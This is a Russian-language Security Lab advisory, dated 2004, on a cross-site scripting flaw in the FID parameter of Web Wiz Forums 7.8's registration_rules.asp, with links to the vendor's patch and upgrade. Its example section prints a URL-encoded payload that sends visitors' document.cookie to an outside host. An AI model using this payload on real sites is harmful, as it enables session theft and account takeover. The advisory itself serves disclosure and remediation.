Security Lab

Межсайтовое выполнение сценариев в Web Wiz Forums

Дата публикации:17.06.2004
Всего просмотров:2190
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Web Wiz Forums 7.x
Уязвимые версии: Web Wiz Forums 7.8; Предыдущие версии также уязвимы

Описание: Обнаружено межсайтовое выполнение сценариев в Web Wiz Forums. Удаленный атакующий может получить важные данные пользователей.

Уязвимость существует из-за недостаточной проверки параметров FID в сценарии registration_rules.asp. Злоумышленник может выполнить произвольный сценарий в браузере пользователя в контексте безопасности уязвимого сайта.

Пример/Эксплоит :

registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+s rc%3D%22javascript
%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2Ecom%2Fxss
%2F%3F%27%2Bdocument%2Ecookie%22%3E

URL производителя: http://www.webwizguide.info/web_wiz_forums/

Решение: Установите патч:
http://www.zap2.me.uk/7.7a_and_7.8_to_7.9_patch_files.zip
или новую версию форума
http://www.webwizguide.info/web_wiz_forums/forum_download.asp?mode=

Ссылки: WEB WIZ FORUMS REGISTRATION RULES XSS VULNERABILITY